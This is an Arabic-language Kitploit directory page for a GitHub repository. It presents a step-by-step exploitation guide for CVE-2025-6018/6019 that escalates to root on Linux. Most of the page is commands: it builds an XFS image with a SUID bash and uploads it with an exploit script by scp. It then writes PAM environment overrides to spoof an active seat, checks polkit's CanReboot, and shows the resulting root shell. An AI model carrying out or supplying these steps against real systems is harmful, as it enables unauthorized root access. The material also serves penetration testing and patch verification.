Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-6018 — دليل استغلال الثغرات CVE-2025-6018/6019 لتصعيد الامتيازات عبر معالجة صور XFS وإساءة استخدام متغيرات بيئة PAM للحصول على صلاحيات الجذر على أنظمة Linux. | Kitploit
أدوات/GitHubGitHub/e1arth/cve-2025-6018
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHube1arth/cve-2025-6018

CVE-2025-6018

دليل استغلال الثغرات CVE-2025-6018/6019 لتصعيد الامتيازات عبر معالجة صور XFS وإساءة استخدام متغيرات بيئة PAM للحصول على صلاحيات الجذر على أنظمة Linux.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دليل رفع الامتيازات لـ CVE-2025-6018 + CVE-2025-6019

中文

📋 خطوات الاستغلال السريعة

الخطوة 1: إعداد صورة XFS (الجهاز المحلي)

root@kitploit:~
# إنشاء صورة XFS بحجم 300 ميجابايت
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# تحميل الصورة وتثبيت SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# التحقق (يجب أن يظهر 300M)
ls -lh xfs.image

الخطوة 2: رفع الملفات إلى الهدف

root@kitploit:~
# رفع سكريبت الاستغلال والصورة
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

الخطوة 3: أول تسجيل دخول - تكوين PAM

root@kitploit:~
# تسجيل الدخول عبر SSH إلى الهدف
ssh [email protected]

# كتابة متغيرات بيئة PAM
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# التحقق من التكوين
cat ~/.pam_environment

# 🔥 هام: تسجيل الخروج (لتفعيل تكوين PAM)
exit

الخطوة 4: تسجيل الدخول الثاني - تنفيذ رفع الامتيازات

root@kitploit:~
# إعادة تسجيل الدخول عبر SSH (تكوين PAM نشط الآن)
ssh [email protected]

# التحقق من نشاط PAM (يجب أن يُرجع "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# تنفيذ سكريبت رفع الامتيازات
bash exp.sh

✅ مؤشرات النجاح

إذا نجح الاستغلال، يجب أن ترى:

root@kitploit:~
✓ تم العثور على SUID bash: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ تم تأكيد صلاحية الجذر!

════════════════════════════════════════════════════════════
║ علم الجذر                                               ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 حل المشكلات

المشكلةالحل
CanReboot يُرجع ('no',)

📌 نقاط رئيسية

  • ✅ يجب تسجيل الخروج وإعادة الدخول: تكوين PAM يُفعّل فقط في الجلسات الجديدة
  • ✅ تحقق من CanReboot: تأكد من أنه يُرجع ('yes',) قبل تشغيل السكريبت
  • ✅ استخدم تسجيل الدخول عبر SSH: لا تستخدم أسلوب التنفيذ ssh -t user@host "cmd"

🐱 الحامي القطي

إذا فشل، تأكد من تنفيذ كل خطوة بدقة بالترتيب!

تنزيل الأداة
تأكد من تسجيل الخروج والدخول مرة أخرى (الخطوة 3)
خطأ Not authorizedتحقق من محتوى ~/.pam_environment أنه صحيح
لم يتم العثور على SUID bashأعد رفع xfs.image وتحقق من تعيين بت SUID